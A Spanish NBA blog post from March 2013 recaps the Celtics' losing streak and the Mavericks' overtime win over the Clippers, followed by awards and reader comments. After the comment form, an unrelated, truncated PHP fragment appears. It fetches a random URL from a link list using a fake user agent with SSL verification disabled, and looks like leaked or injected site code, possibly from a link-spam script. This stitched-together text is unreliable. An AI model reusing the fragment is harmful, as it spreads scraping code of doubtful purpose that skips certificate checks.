La Crónica: Infierno verde

27 de March de 2013 por txusma

Hace poco más de una semana, parecía que Boston iba a comerse el mundo e incluso se permitía el lujo de soñar en conseguir la ventaja de campo para los Playoffs. Ahora, 5 partidos perdidos consecutivos después, la realidad es bastante diferente. La igualdad que predomina en la conferencia Este ha hecho caer a los verdes a la séptima posición y solo otra mini crisis de los Bucks evita que los Heat sean su actual pareja de baile para la primera ronda.

Anoche fue New York quien asaltó el Garden. Carmelo Anthony y JR Smith se bastaron para imponerse a unos mermadísmos Celtics (100-85). A las bajas ya conocidas de Rondo y Sullinger, se unen ahora la de Garnett (por dos semanas) y Courtney Lee. Demasiado para cualquier equipo.

En el Oeste es curioso comprobar que los 3 equipos que luchan por la tercera posición de la conferencia han perdido sus últimos partidos. Los últimos fueron los Clippers que cayeron ante los Mavs en la prórroga tras un final de tiempo regular increíble. Chris Paul puso por delante a su equipo a falta de 5 segundos pero OJ Mayo empató el partido con un gran movimiento en el poste abajo con solo 0’6 segundos el marcador. Matt Barnes sacó de fondo y lanzó la pelota a la zona rival donde Blake Griffin la recogió en el aire y anotó la canasta. Lo que tenía que convertirse en la jugada del año quedó en nada al pitar los árbitros falta en ataque de Griffin. En la prórroga, los Clippers se colapsaron y Dirk Nowitzki los sentenció (102-109). Que vigilen los Lakers que los Mavs ya les pisan los talones.

En el último partido de la jornada, los Wolves regalaron la séptima derrota consecutiva a los Pistons merced a un atípico acierto desde la línea de 3 (105-82).

PREMIOS

MVP: Volvió el Dirk Nowitzki de antaño, el de los decisivos tiros en los grandes momentos. Buena parte de sus 33 puntos llegaron en la prórroga.

Sorpresa: A JJ Barea el aro se le convirtió en piscina y anotó 21 puntos, con un 8 de 11 en tiros de campo y un 5 de 7 en triples.

Decepción: Blake Griffin no jugó uno de sus mejores partidos. Se quedó en 14 puntos tras fallar 8 de sus 12 lanzamientos.

Esfuerzo en vano: Chris Paul jugó un partido prácticamente perfecto (33 puntos, 12 de 15 en tiros de campo, 6 rebotes, 5 asistencias, 2 robos) pero se encontró con OJ Mayo y Dirk Nowitzki.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Vaya canasta de Mayo ganando la línea,y lo de Blake hubiera sido canastón,en 0.2 seg como hacer una canasta,aunque para mí es falta clara.Pues victoria importantísima para Dallas para agobiar a los Lakers,que además pierden a Metta WP según leí por twitter.Adiós a la temporada,lo que no sé es si sólo la RS o incluyendo PO.Contratiempo importante para ellos porque MWP es de los pocos que defienden ahí.

      Citar

  2. Oli dice:
    #2

    Pues si otra lesión más, va a estar muy interesante los proximos partidos sobretodo con el dallas-lakers que se juega en unos días, yo todavía tengo esperanzas del spurs-lakers en primera ronda y que ahi demos la sorpresa!! Eso si ni los lakers, thunder, clippers, spurs,..les veo plantandoles cara a estos heat y mira que me da rabia pero hay que admitir la superioridad que tienen.

      Citar

  3. Denise dice:
    #3

    Hincharme a palos pero creo que para Lakers es más grave una lesión de MWP que por ejemplo de Pau Gasol. Obviamente Gasol es mejor jugador que MWP, pero éste es el unico alero puro de la plantilla y el único capacitado para defender a un Durant o un Lebron en un hipotetico cruce. Además, para mí estaba haciendo una de sus mejores campañas en los últimos años…
    La esperanza para Lakers ahora es ó que Ebanks salga del fondo del armario para ser titular y explote o pueda dar un buen rendimiento “a lo Earl Clark” ó si no van a tener que tirar de algún alero veterano semi-retirado para rellenar la posición. Desde principios de temporada tenían un problema que se vería acrecentado si había lesiones, y era el overbooking de bases con Nash, Blake, Morris y Duhon; y la escasez de aleros.

      Citar

  4. nba dice:
    #4

    Bueno, bueno los Lakers les ha tocado el poker esta temporada, todos sus titulares han estado lesionados en algun momento ,que se den con un canto en los dientes si consiguen mantener la octava plaza

      Citar

  5. Jose Luis dice:
    #5

    Lo de las lesiones de Lakers ya es similar a la de los Wolves.

      Citar

  6. MagicJohnson32 dice:
    #6

    Anda, está jugando Marc Gasol =o

      Citar

  7. Blade Petrovic dice:
    #7

    Y se acaba la gran racha a mano de unos Bulls liderados por Deng y Boozer

      Citar

  8. Blade Petrovic dice:
    #8

    Lo de R.Evans es descomunal 26 rebotes se cascó el tío..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>